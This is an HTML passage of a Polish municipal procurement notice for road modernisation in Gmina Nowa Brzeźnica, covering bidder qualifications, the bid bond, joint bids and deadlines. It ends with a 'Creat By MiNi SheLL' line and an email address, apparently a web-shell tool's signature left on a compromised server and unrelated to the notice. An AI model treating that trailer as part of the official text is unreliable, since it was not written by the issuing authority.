:<br/>A.	pełnił funkcję inspektora nadzoru inwestorskiego w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dla dwóch inwestycji związanych z robotami budowlanymi polegającymi na budowie, rozbudowie lub przebudowie dróg publicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału <br/>w postępowaniu:<br/>Dla części 1 zamówienia:<br/>– wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór określony w Rozdziale III do SWZ;<br/>- wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich <br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz <br/>z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wzór określony w Rozdziale III do SWZ.<br/>Dla części 2 zamówienia:<br/>- wykaz inwestycji związanych z robotami budowlanymi polegającymi na budowie, rozbudowie lub przebudowie dróg publicznych, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, w których Wykonawca pełnił funkcję inspektora nadzoru inwestorskiego.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wymagane oświadczenia są zawarte w Rozdział II SWZ ZP.271.5.2023 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 11.	Wymagania dotyczące wadium<br/>11.1.	Zamawiający określa kwotę wadium wyłącznie dla części 1 w wysokości 40 000,00 złotych (słownie : czterdzieści tysięcy złotych 00/100).<br/>11.2.	Wadium wykonawca wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofert.<br/>11.3.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020r, poz. 299).<br/>11.4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczego w Pajęcznie oddział w Nowej Brzeźnicy Nr rachunku: 82 8265 1024 2001 0000 0026 0010 z dopiskiem:<br/>Wadium – „Kompleksowa modernizacja dróg wraz ze zintegrowaną infrastrukturą drogową w Gminie Nowa Brzeźnica”- część 1;<br/>11.5.	Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto zamawiającego przed upływem terminu składnia ofert.<br/>11.6.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>11.7.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa <br/>w ust. 3 pkt 2–4, wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>Pozostałe informacje dot. wadium zawarte zostały w pkt. 11 Rozdziału I Specyfikacji Warunków Zamówienia <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.6.	Wykonawcy wspólnie ubiegający się o zamówienie:<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia.<br/>2)	W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu <br/>i zawarcia umowy w sprawie zamówienia publicznego.<br/>3)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 7.1., składa każdy z wykonawców. Oświadczenia te dołączone do oferty potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4)	W przypadku określenia przez Zamawiającego warunku dotyczącego zdolności do występowania w obrocie gospodarczym lub zdolności technicznej lub zawodowej wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w pkt 6.4 IDW, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Formularz oświadczenia stanowi załącznik nr 3 do IDW.<br/>5)	Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>7.7.	W zakresie rodzajów, okresu ważności i formy, w jakiej mogą być składane oświadczenia lub dokumenty, o których mowa w pkt 7.4. SWZ obowiązują przepisy Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. <br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U z 2020 r. poz. 2415)<br/>7.8.	Informacja o przedmiotowych środkach dowodowych <br/>Zamawiający nie określa przedmiotowych środków dowodowych w celu potwierdzenia zgodności oferowanych dostaw, usług lub robót budowlanych z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub opisie kryteriów oceny ofert lub wymaganiami związanymi z realizacja zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj, zakres zmian oraz warunki ich wprowadzenia zostały określone w Rozdziale IV SWZ - wzór umowy w sprawie zamówienia publicznego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez Platformy Marketplanet dostępny pod adresem: https://nowabrzeznica.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-04 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com